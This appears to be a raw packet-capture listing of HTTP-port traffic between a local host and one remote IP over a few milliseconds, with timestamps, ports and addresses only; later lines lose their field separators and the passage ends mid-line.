Feb 21, 2025 01:53:53.587579966 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.587610960 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.587640047 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.587673903 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.587703943 CET | 80 | 49712 | 185.196.8.37 | 192.168.2.8
Feb 21, 2025 01:53:53.587703943 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.587714911 CET | 80 | 49712 | 185.196.8.37 | 192.168.2.8
Feb 21, 2025 01:53:53.587724924 CET | 80 | 49712 | 185.196.8.37 | 192.168.2.8
Feb 21, 2025 01:53:53.587734938 CET | 80 | 49712 | 185.196.8.37 | 192.168.2.8
Feb 21, 2025 01:53:53.587737083 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.587774992 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.587801933 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.587832928 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.587855101 CET | 80 | 49712 | 185.196.8.37 | 192.168.2.8
Feb 21, 2025 01:53:53.587863922 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.587866068 CET | 80 | 49712 | 185.196.8.37 | 192.168.2.8
Feb 21, 2025 01:53:53.587877035 CET | 80 | 49712 | 185.196.8.37 | 192.168.2.8
Feb 21, 2025 01:53:53.587886095 CET | 80 | 49712 | 185.196.8.37 | 192.168.2.8
Feb 21, 2025 01:53:53.587902069 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.587935925 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.587965965 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.587973118 CET | 80 | 49712 | 185.196.8.37 | 192.168.2.8
Feb 21, 2025 01:53:53.587982893 CET | 80 | 49712 | 185.196.8.37 | 192.168.2.8
Feb 21, 2025 01:53:53.587991953 CET | 80 | 49712 | 185.196.8.37 | 192.168.2.8
Feb 21, 2025 01:53:53.587992907 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.588001013 CET | 80 | 49712 | 185.196.8.37 | 192.168.2.8
Feb 21, 2025 01:53:53.588011980 CET | 80 | 49712 | 185.196.8.37 | 192.168.2.8
Feb 21, 2025 01:53:53.588035107 CET | 80 | 49712 | 185.196.8.37 | 192.168.2.8
Feb 21, 2025 01:53:53.588047981 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.588058949 CET | 80 | 49712 | 185.196.8.37 | 192.168.2.8
Feb 21, 2025 01:53:53.588103056 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.588135958 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.588162899 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.588195086 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.588202953 CET | 80 | 49712 | 185.196.8.37 | 192.168.2.8
Feb 21, 2025 01:53:53.588212013 CET | 80 | 49712 | 185.196.8.37 | 192.168.2.8
Feb 21, 2025 01:53:53.588222027 CET | 80 | 49712 | 185.196.8.37 | 192.168.2.8
Feb 21, 2025 01:53:53.588222980 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.588275909 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.588300943 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.588347912 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.588373899 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.588381052 CET | 80 | 49712 | 185.196.8.37 | 192.168.2.8
Feb 21, 2025 01:53:53.588391066 CET | 80 | 49712 | 185.196.8.37 | 192.168.2.8
Feb 21, 2025 01:53:53.588399887 CET | 80 | 49712 | 185.196.8.37 | 192.168.2.8
Feb 21, 2025 01:53:53.588413954 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.588450909 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.588475943 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.588491917 CET | 80 | 49712 | 185.196.8.37 | 192.168.2.8
Feb 21, 2025 01:53:53.588500977 CET | 80 | 49712 | 185.196.8.37 | 192.168.2.8
Feb 21, 2025 01:53:53.588507891 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.588510990 CET | 80 | 49712 | 185.196.8.37 | 192.168.2.8
Feb 21, 2025 01:53:53.588541985 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.588568926 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.588572025 CET | 80 | 49712 | 185.196.8.37 | 192.168.2.8
Feb 21, 2025 01:53:53.588582039 CET | 80 | 49712 | 185.196.8.37 | 192.168.2.8
Feb 21, 2025 01:53:53.588603020 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.588634014 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.588665962 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.588690996 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.588726044 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.588737011 CET | 80 | 49712 | 185.196.8.37 | 192.168.2.8
Feb 21, 2025 01:53:53.588747025 CET | 80 | 49712 | 185.196.8.37 | 192.168.2.8
Feb 21, 2025 01:53:53.588752985 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.588756084 CET | 80 | 49712 | 185.196.8.37 | 192.168.2.8
Feb 21, 2025 01:53:53.588767052 CET | 80 | 49712 | 185.196.8.37 | 192.168.2.8
Feb 21, 2025 01:53:53.588785887 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.588819027 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.588824034 CET | 80 | 49712 | 185.196.8.37 | 192.168.2.8
Feb 21, 2025 01:53:53.588834047 CET | 80 | 49712 | 185.196.8.37 | 192.168.2.8
Feb 21, 2025 01:53:53.588852882 CET | 80 | 49712 | 185.196.8.37 | 192.168.2.8
Feb 21, 2025 01:53:53.588852882 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.588862896 CET | 80 | 49712 | 185.196.8.37 | 192.168.2.8
Feb 21, 2025 01:53:53.588876963 CET | 80 | 49712 | 185.196.8.37 | 192.168.2.8
Feb 21, 2025 01:53:53.588893890 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.588927031 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.588958979 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.588984013 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.589015007 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.589021921 CET | 80 | 49712 | 185.196.8.37 | 192.168.2.8
Feb 21, 2025 01:53:53.589031935 CET | 80 | 49712 | 185.196.8.37 | 192.168.2.8
Feb 21, 2025 01:53:53.589040995 CET | 80 | 49712 | 185.196.8.37 | 192.168.2.8
Feb 21, 2025 01:53:53.589044094 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.589097023 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.589123011 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.589167118 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.589191914 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.589196920 CET | 80 | 49712 | 185.196.8.37 | 192.168.2.8
                                      Feb 21, 2025 01:53:53.589206934 CET8049712185.196.8.37192.168.2.8
                                      Feb 21, 2025 01:53:53.589216948 CET8049712185.196.8.37192.168.2.8
                                      Feb 21, 2025 01:53:53.589232922 CET4971280192.168.2.8185.196.8.37
                                      Feb 21, 2025 01:53:53.589266062 CET4971280192.168.2.8185.196.8.37
                                      Feb 21, 2025 01:53:53.589294910 CET4971280192.168.2.8185.196.8.37
                                      Feb 21, 2025 01:53:53.589298010 CET8049712185.196.8.37192.168.2.8
                                      Feb 21, 2025 01:53:53.589308977 CET8049712185.196.8.37192.168.2.8
                                      Feb 21, 2025 01:53:53.589317083 CET8049712185.196.8.37192.168.2.8
                                      Feb 21, 2025 01:53:53.589328051 CET4971280192.168.2.8185.196.8.37
                                      Feb 21, 2025 01:53:53.589365005 CET4971280192.168.2.8185.196.8.37
                                      Feb 21, 2025 01:53:53.589391947 CET4971280192.168.2.8185.196.8.37
                                      Feb 21, 2025 01:53:53.589426994 CET4971280192.168.2.8185.196.8.37
                                      Feb 21, 2025 01:53:53.589452982 CET4971280192.168.2.8185.196.8.37
                                      Feb 21, 2025 01:53:53.589484930 CET4971280192.168.2.8185.196.8.37
                                      Feb 21, 2025 01:53:53.589490891 CET8049712185.196.8.37192.168.2.8
                                      Feb 21, 2025 01:53:53.589513063 CET4971280192.168.2.8185.196.8.37
                                      Feb 21, 2025 01:53:53.589520931 CET8049712185.196.8.37192.168.2.8
                                      Feb 21, 2025 01:53:53.589529991 CET8049712185.196.8.37192.168.2.8
                                      Feb 21, 2025 01:53:53.589565992 CET4971280192.168.2.8185.196.8.37
                                      Feb 21, 2025 01:53:53.589591980 CET4971280